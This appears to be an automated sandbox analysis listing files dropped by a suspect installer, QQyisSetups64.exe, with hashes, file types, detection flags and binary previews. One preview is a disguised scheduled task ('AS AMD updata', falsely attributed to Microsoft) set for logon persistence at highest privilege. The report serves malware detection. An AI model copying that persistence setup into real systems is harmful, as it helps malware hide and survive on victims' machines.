                                                                                                                                                                                                                    SHA-512:E142D5F4E1692E964A97BDDCE865877506D7CB84463789D2F72EA09DA84FE910926E6EBCDA9EE3F84110B10C63ECF2B9D119F5246CE613F65D4F3F4BB63A1603
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.j..... ...............X\...;...{......................0.`.....42...{5..:...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.................................."I.M.:...|....................a..:...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                                                    Entropy (8bit):0.082469114165686
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:ttlEYecvixyqt/57Dek3JFOzpZS/YllEqW3l/TjzzQ/t:ttlEzuErR3t0pZiImd8/
                                                                                                                                                                                                                    MD5:83616E5550B22596AE63B67A36519E5F
                                                                                                                                                                                                                    SHA1:7CEAB0590D620D2816EFE21B190CF69D2C24FF6A
                                                                                                                                                                                                                    SHA-256:D9E2F640E309F7813765B8E53870F90900019C181340ECC684F98AE888C97D6B
                                                                                                                                                                                                                    SHA-512:E25FC14BD1756ACCCF3929BFFC63318792CE4A8B085A545804E02120DC471822D4FE4A6A9C82692B389EDB937C2DE88A0105D5ABEF73715547C4AB456F9A4F0E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:s.^......................................;...{...:...|..42...{5.........42...{5.42...{5...Y.42...{59..................a..:...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):648
                                                                                                                                                                                                                    Entropy (8bit):7.46325903759004
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                                                                    MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                                                                    SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                                                                    SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                                                                    SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..*`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z...*.8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4118496
                                                                                                                                                                                                                    Entropy (8bit):7.743814085153487
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                                                                    MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                                    SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                                                                    SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                                                                    SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                    Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                                                                                    MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                                                                                    SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                                                                                    SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                                                                                    SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:@...e................................................@..........
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1893
                                                                                                                                                                                                                    Entropy (8bit):5.212287775015203
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                                                                                                                                    MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                                                                                                                                    SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                                                                                                                                    SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                                                                                                                                    SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):648
                                                                                                                                                                                                                    Entropy (8bit):7.46325903759004
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                                                                    MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                                                                    SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                                                                    SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                                                                    SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..*`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z...*.8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:Generic INItialization configuration [360Safe]
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                    Entropy (8bit):5.54815735280418
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:9QQ08ETkByYcqQZLTvOIuAALne2toBFjlVH:9QUETacqQJWIdAzxtonlV
                                                                                                                                                                                                                    MD5:CB13859BCE5ADF79C6B2E1C4601FA06A
                                                                                                                                                                                                                    SHA1:5562D46E7FBD8A3FF92AFE2270B23F5E73FF45D7
                                                                                                                                                                                                                    SHA-256:601CFCA4A7123503331D7641666F7F48164AEB2494B007ECE4C8880F51AF6E2D
                                                                                                                                                                                                                    SHA-512:C355FAE3C70B875A08F4BA8BC7D9463D5DB686D2113970F0ED17A5D723DA2ADF82334AFAF3345AABB51A2A89873C15926341AA18D90FF374FA1FB68B82BF3AC4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:[360Installer]..SlideShowResourceURL=http://down.360safe.com/360safe/slideshow_new.cab..From=h_inst..Product=360Safe....[360Safe]..Name=360........Pid=h_inst..FID=setup_13.0.0.2008k..Version=13.0.0.2009..RegVersionFile=360Ver.dll..IsBeta=0..Urls=pdown://b2=100027000|p2=B0A12507C5F7FB22D8E1EB5B2682074BD0218EF0|p3=20|p7=15|c2=1|b5=360......|b6=........|b7=5|b9=1|http://dl.360safe.com/setup_13.0.0.2008k.exe..MD5FileID=E901BD5EEF684DD36520382E5FC26236..SetupParam=/pid=h_inst /noreboot=1 /installer=1 /S..SlideShowImage=360safe_1.png,360safe_2.png,360safe_3.png,....[360signdata]..sign=0100000094BB9E7DD93895D39142938A10B443920CBE15CC1E5C20E47CA37526F047D27B4EE9567798C27E09EB3C005E187E0CE1A9B7EA4C2DA5D92120A8B6ABEBF270462455BBA3FD1AA5ACE5C44196EF1083BB9FAEDAD4C74F82DEFB96A173B5519816D7C03F06C87BAC684A0CF6FB459E487DCDEF38C3AF0864CB102E42D0FF3412A0
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):17
                                                                                                                                                                                                                    Entropy (8bit):2.409267252251469
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:lsS+n:U
                                                                                                                                                                                                                    MD5:983514E15961BFDA71A616E3CA412147
                                                                                                                                                                                                                    SHA1:8A938B2349A33CB8A45975F5E1084AC4ED702C72
                                                                                                                                                                                                                    SHA-256:D22207FA67A53E84F79BEB0C103430CCAC7A6D6EEC028262135DDE91079F5566
                                                                                                                                                                                                                    SHA-512:2C3D100D47A806CCB23F9ABCE816869C80B21EF6B6479C5A7BDEE47F9B14FCD004EE99F30ECC39A60AE35B1ADB0D4DAC52E58DABDB1885940A8888AC1E61B60E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.................
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:PNG image data, 600 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):16151
                                                                                                                                                                                                                    Entropy (8bit):7.9414528437087935
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:9SmRt7jn8csHkzjhJuCwQ19rtw5srwat0ADwP0F43ec1:dt7bjsHkBwCwseat0AkdOc1
                                                                                                                                                                                                                    MD5:3641846128E0A27A28CA0DBA8942B896
                                                                                                                                                                                                                    SHA1:88C40C9923AB48E0C01883A773E297541CE49882
                                                                                                                                                                                                                    SHA-256:CBF7CD45FE193E0A438CE14B0176077762E984F897091A682F9E866983DA9174
                                                                                                                                                                                                                    SHA-512:15910E5A279F17EA06618CB8DCBB64FE8F8E6F5061FC14BCA6A92FF2795CF64EACEB2067104358A014079550CA1B4F24200935E2F10B1EDE6622D94794047550
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.PNG........IHDR...X...|.....$m5S...GPLTE..q..q..r....v..#.....(.~+.1...w>...q..q.....r$.v".u..t..t..s..w(.w..q........}*.y..{..'.y-.y#.y1.z.....w..y6.|..{......t....x .".|'...~-.},.:.!.".%.$.(..9.}=.}%.|*./.{J.C.A.?.|+.D.0.2.2.~)...,.0.~?.?...~I.).1.x".'.|G.5.8.{N.Q.G.J.R.Q.Z.5.:.Y.Y.U..X1...M..Hc.i..\H.q..Tv.h...a....tRNS..f..f.f........hE..=pIDATx..m..`.....0..@.)q3.P.A...XDH.Q79_...B..=_;....o.i.r....q].u.....I..........w4.._..wv...E.Vs....x..v.O...>.Z......kw^...O.`..Hb........_. h.t_t:mM.b. 8@...%.)^...i.C....<...:.:a..~....... ..|....Y.l5....`&...-'..-.......&".#....ZB,..VL..../.B,.V.V.W|.Za......CZ.X\.....aT...x".w.}#.bu$.,K.....U.Y..j..U.AQ....W...{u~.....T..agf..:^f./O,.3.g..J"k^.Y....W..z'..T8<.b..ZA*.............*.....f....,*.n`Y.ld.b.K.KDV..b..S.%..F.h.O.WAEd).....#..5`^.D..Y........2&....S..S..Ax.W'....f.....+....]..}.ZQ.d..3...m.3...}.~......C..v.Y.b.........X,...l.1.)N.Y....[.....b=...=.
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):704608
                                                                                                                                                                                                                    Entropy (8bit):6.625840358726942
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:1IhyxJ3BYXF6WxYC2aeHACRYlH+ZOAyTjUnIgidGtAd8Rwb33+YnBsLS683wK9T7:ih8WxYCyYlaOYnliItjRwbH+YBsLS68N
                                                                                                                                                                                                                    MD5:D875875EB3282B692AB10E946EA22361
                                                                                                                                                                                                                    SHA1:34BCEF8A8CB0E1DB44671892AC3CBD74D3C541A8
                                                                                                                                                                                                                    SHA-256:0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                                                                                                                                                                                                    SHA-512:972466310D3C145141320584B5F3E431C6888BDA2BA1036F85E68E534ED6FB97BA04CBD46D8D9C401DC5857100DC1BFF1BAD82B50514F3E5C582522F22FD2B5C
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...nl..nl..nl..I..ol...s..fl..p>'.kl...#5.kl..g.6.Ol..g.*.el..I..ql..nl...m..g. ..l..g.'..l..g.1.ol..p>7.ol..nl4.ll..g.2.ol..Richnl..................PE..L......Z...........!......................................................................@..............................................................5......LS...................................................................................text............................... ..`.rdata..w...........................@..@.data...`........4..................@....rsrc...............................@..@.reloc..`p.......r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):304652
                                                                                                                                                                                                                    Entropy (8bit):7.999195439763513
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:6144:dl5TTOp1tnABtoSIkutXiC3NxDPYhroRN6AxPM1CKSNEZ4:1TmTAB+XddZAahrKGT
                                                                                                                                                                                                                    MD5:8039C279A02FEA0387E8D51BDDE541D5
                                                                                                                                                                                                                    SHA1:A6A52EF6C01FDE3A1A1C702C41777119DBDB203A
                                                                                                                                                                                                                    SHA-256:0BA9A3E6E4B89ED8C30C092845ECAB5939AFE4C701A130FDC6ECC9D0EC1A8386
                                                                                                                                                                                                                    SHA-512:97F45BF13FF85AD252B46C8E62D2D114E84B3AEF17AA2E3B21CE47B41B416D2000506EE9BFABBC055295817CE6D7D9771A038ACFAE514CCA852EF861751C7254
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MSCF............,...............(...H.......`..........L.z .360P2SP.dll.h..G.G..[...3.@..."R`4..m....mnu..e.r.\.K.J.....u.Pw..9f..u..H..?7.=z."|..^ ...].fi.r...........biw.Se6".p......;N....o.rI.x...$.IN.><...o......[6.k.[.lRvl..zK.{v.kKh6!36kOi..6.3Z.`.6+.B..c.t2.B)Zq.3$..V.@w......... T..4DWF.`.W..~.<.....73o7&7.L..5....rF....E.....~.@.@{...B~~.ho.D..X..pH+.. ..}-BMrx.".dU....e".nk.D...................L..e...L..~3E.......H.r..6m.G.o..z...g......}....zT.[-.K.{.\......W?..}.^....<.z.W.y.i.z&....@.-..AJN9.[.J.]Z.....k...+.2....M.........H.H...E"....`.....p.,>Q.....D.....>.B.*{..t;bw..hb.....dW8.....eH2.l....^...KyD.Z.`I.........^W..k.$..;n.I..&.>s.8..WF...}......W)...:.-Sp<m..:\..U..]JT....Kw.(.......x.:.-..C..e..a..... {...!Y./1.MnF..05...9......}...+WR8W.z...fe...+..s5.....E.6w.rzP.&..Ii...h.....L$....Z~.}N...W9.6pMt4.f..R...RL.........CH:.Q.-a1... ........Y.......P..B.:M.........l.w..Xn.....VN...7Fk*G...3...H....i.C..`q4.Q.&.9.X...^.p/.K.(....
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:PNG image data, 491 x 161, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1556
                                                                                                                                                                                                                    Entropy (8bit):7.507131051649285
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:LZwmgblk3k44Yo4bo4Y4ofXQLo4LoXgMXI7gAgXILs/fHAnzPCpdyIIMGb34oYYI:OpO0P3nfXfX/HXPX/HXai+MGb34Z
                                                                                                                                                                                                                    MD5:402C9D31E2079948E743562CB48AF2A6
                                                                                                                                                                                                                    SHA1:5111E39A19E0675A44369E03D4A82132F0D12977
                                                                                                                                                                                                                    SHA-256:D82DF7AFA80AB17CF1D298488C66902F192034B6BB18176F5BD5C5B74E348E79
                                                                                                                                                                                                                    SHA-512:27510489FAA6562507CBDB0B5F545D9124D6BA59D41A65224DD6089A9C8331279CE83905B26D41453255BDA660FBAAE957E0E17D43350DFCB86603888177C760
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.PNG........IHDR..............g-....pHYs...........~.... cHRM..z%..............u0...`..:....o._.F....PLTE.................................................................................................................................................................................;;;<<<===>>>???@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbcccdddeeefffggghhhiiijjjkkklllmmmnnnooopppqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||}}}~~~...................................................................................................................................................................................................................................................................................................................................................................................................B.F.....IDATx...[s.D....-.d.%...L...r*.8.....9.pC...d.g.HQf<..7.o....ju.Z.V.n9.[...u......w9wo.[./....U^....9or
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:PNG image data, 604 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):14344
                                                                                                                                                                                                                    Entropy (8bit):7.934027356242661
                                                                                                                                                                                                                    Encrypted:false
